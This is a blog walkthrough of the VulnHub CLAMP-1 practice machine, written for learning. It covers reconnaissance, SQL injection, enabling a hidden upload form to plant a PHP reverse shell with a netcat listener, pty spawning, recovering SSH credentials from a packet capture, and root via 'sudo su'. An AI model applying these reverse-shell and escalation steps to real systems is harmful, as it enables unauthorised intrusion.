【vulnhub】CLAMP-1 打靶渗透

最新推荐文章于 2024-09-16 17:27:40 发布
最新推荐文章于 2024-09-16 17:27:40 发布
阅读量276 收藏 8
点赞数 4
文章标签: web安全 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62162207/article/details/141002760
版权

一、信息收集

1.查看MAC地址

2.主机探测

arp-scan -l

3.端口扫描

nmap -A -v -T4 192.168.172.175 -p 1-65535

4.目录扫描

扫出了两个目录

二、内网渗透

打开80端口,并没有其他功能点

拼接扫出的目录,发现没有内容

拼接第二个目录,除了一张没有用的图片,后面还存在10个问题且为判断

那么我们想将正确用1表示错误用0表示

即最后的结果为0110111001

没有找到需要用的到密码的地方,猜想是否为一个目录,拼接查看

发现页面发生跳转,打开一个网页,在页面上寻找功能点

在该URL下跑出了一个SQL注入

尝试利用,在gereksiz表单中存在一个URL

但是好像被加密过,尝试解密

解密地址:https://cryptii.com/pipes/caesar-cipher

拼接访问

http://192.168.172.175/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

打开一个如上页面,依旧没有任何功能点

想到后面还有一个upload.php,拼接访问

终于找到一个类似文件上传处,但是没有上传按钮

猜测可能是隐藏掉了,查看源代码

尝试可不可以写入一个提交按钮,发现可以写入

上传一个反弹shell的php文件

利用kali上的反弹shell文件,将其上传到该网站下

locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php     #IP修改为kali

成功爆出路径

发现文件提示好像是以osas尾数,MD5值命名

将文件名进行MD5加密

kali监听4444端口

nc -lvvp 4444

访问文件

http://192.168.172.175/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/8f218f759515e36eab5b4461430994f6.php

成功反弹

获取交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

三、提权

cd /var/www/html
ls

猜测important.pcapng可能是一个路径

访问下载这个文件

利用Wireshark进行流量分析

发现在email处有ssh密码通过url解码得到:mklpc-osas112.

email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work

URL解码

ssh进行远程连接

连接成功

发现依旧不是最高权限,再次提权

sudo -l

发现是(ALL : ALL) ALL:表示用户可以在任何主机上以任何用户身份执行任何命令。

sudo su

提权成功

下届免单用户
关注
line-clamp
weixin_30293079的博客
07-17 1892
转自:https://www.cnblogs.com/jing-tian/p/11048853.html#_label0 CSS3属性—— line-clamp控制文本行数 ====== 目录 说明: 正文 回到顶部 说明: 限制在一个块元素显示的文本的行数。 -webkit-line-clamp 是一个 不规范的属性(unsup...
webkitlineclamp css3,CSS webkit-line-clamp用法及代码示例
热门推荐
weixin_33251169的博客
08-03 1万+
-webkit-line-clamp属性用于限制块容器可能包含的行数。仅当显示属性设置为“ -webkit-box”或“ -webkit-inline-box”并且“ -webkit-box-orient”属性设置为“垂直”时,此属性才有效。用法:-webkit-line-clamp:none | integer | initial | inherit属性值:none:用于指定内容不会被钳位。它是...
CLAMP-Machine-v1.0.1打靶渗透
m0_65112983的博客
07-30 840
CLAMP-Machine-v1.0.1打靶渗透
line-clamp控制行数失效问题
weixin_34403976的博客
01-09 6409
line-clamp控制行数失效问题 今天接到优化需求,帖子列表里的内容要求缩略至3行,并带‘…’省略号,我毫不犹豫的就给这个content下的div上了一段代码 .cont { display: -webkit-box; -webkit-line-clamp: 3; overflow: hidden; -webkit-box-orient: vertical; } 结果不好使,我以为是...
Css的用法总结part4 line-clamp
Super Livia
02-04 1267
line-clamp 参考:line-clamp 限制在一个块元素显示的文本的行数。 -webkit-line-clamp 是一个 不规范的属性(unsupported WebKit property),它没有出现在 CSS 规范草案中。 为了实现该效果,它需要组合其他外来的WebKit属性。常见结合属性: display: -webkit-box; 必须结合的属性 ,将对象作为弹性伸缩盒子模型显示 。 -webkit-box-orient 必须结合的属性 ,设置或检索伸缩盒对象的子元素的排列
设置多行省略号-webkit-line-clamp
weixin_44845483的博客
02-22 2046
-webkit-line-clamp -webkit-line-clamp CSS 属性 可以把 块容器 中的内容限制为指定的行数 它只有在 display 属性设置成 -webkit-box 或者 -webkit-inline-box 并且 -webkit-box-orient (en-US) 属性设置成 vertical时才有效果 在大部分情况下,也需要设置 overflow 属性为 hidden, 否则,里面的内容不会被裁减,并且在内容显示为指定行数后还会显示省略号(ellipsis ) ellips
vulnhub系列:CLAMP 1.0.1
jq_j37的博客
08-10 364
vulnhub系列:CLAMP 1.0.1靶机,打靶文章
火狐浏览器-webkit-line-clamp兼容问题
bidepanm的博客
06-18 2297
问题描述: firefox68及68以上版本支持-webkit-line-clamp属性 兼容firefox各个版本方案 : 如果某个元素同时存在fd-line-clamp和other-line-clamp两个类,那么other-line-clamp中一定要增加: display: block !important; /*chrome 浏览器实现 ...*/ .fd-line-clamp { overflow: hidden; /** 隐藏超出的内容 **/ word-break: br.
vue -webkit-line-clamp不生效解决
书读百遍,其义自见
09-09 3508
设置css: /*!autoprefixer: off / -webkit-box-orient: vertical; -webkit-line-clamp: 2; /!autoprefixer: on / /! autoprefixer: on / 放自己的css代码 /! autoprefixer: off */ 注:前面有 !
ANSYS仿真案例Workbench有限元计算实例结果源文件流体fluent模型_hydraulic-clamp-2.zip
10-15
本案例着重探讨如何利用Workbench平台进行流体分析,特别是针对液压夹具的流体动力学特性进行仿真计算,以`hydraulic-clamp-2`为例,通过Fluent模块深入理解流体流动的行为和性能。 1. ANSYS Workbench基础 ANSYS ...
StdpC Dynamic Clamp-开源
07-11
这个项目现在托管在 GitHub 上 https://github.com/tnowotny/stdpc StdpC 是面向最终用户神经生理学家的动态夹具。 该软件允许创建人工突触和离子电导,并为人工神经元中的活动模式生成和数据重放提供接口。
clamp-proposal:提出C ++标准的钳位
04-29
文件编号:D0025R1 日期:2015-10-29 修改:P0025R0 项目:C ++编程...考虑到Ranges提议,函数clamp_range()被认为是多余的,并且已从该提议中删除。 使得clamp()的声明样式与min()和max()之一保持一致。 内容 介绍 此
vulnhub靶机之ClAMP
timesleep的博客
12-06 235
首先我们得靶机IP为192.168.34.154 kaliIP为192.168.34.175 首先扫描端口 然后访问一下80 我们接着枚举一下目录 访问一下 也就是0110111001我们把他加到目录后面试试 然后并重定向到了这个界面 然后我们查看源码 大概猜测有sql注入我们用sqlmap跑一下 sqlmap -u "http://192.168.34.154/nt4stopc/0...
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 2551
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
linux-安全管理-防火墙与网络安全
最新发布
Flying_Fish_roe的博客
09-16 1169
在 Linux 系统中,防火墙与网络安全是确保系统安全性的重要组成部分。通过合理配置防火墙规则、使用 SSH 密钥认证、启用 SSL/TLS 加密等手段,管理员可以有效防止网络攻击和未经授权的访问。使用iptables或firewalld管理网络流量,限制不必要的服务和端口。加固 SSH 配置,禁用 Root 登录,使用非默认端口,并启用密钥认证。为 Web 服务配置 SSL/TLS 加密,确保通信安全。使用fail2ban等工具防止暴力破解,定期进行端口扫描和系统安全审计。
网络安全】漏洞挖掘
anquan2233的博客
08-29 2023
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全实训八(y0usef靶机渗透实例)
Wrop的博客
09-12 419
y0usef靶机渗透实例
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 739
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值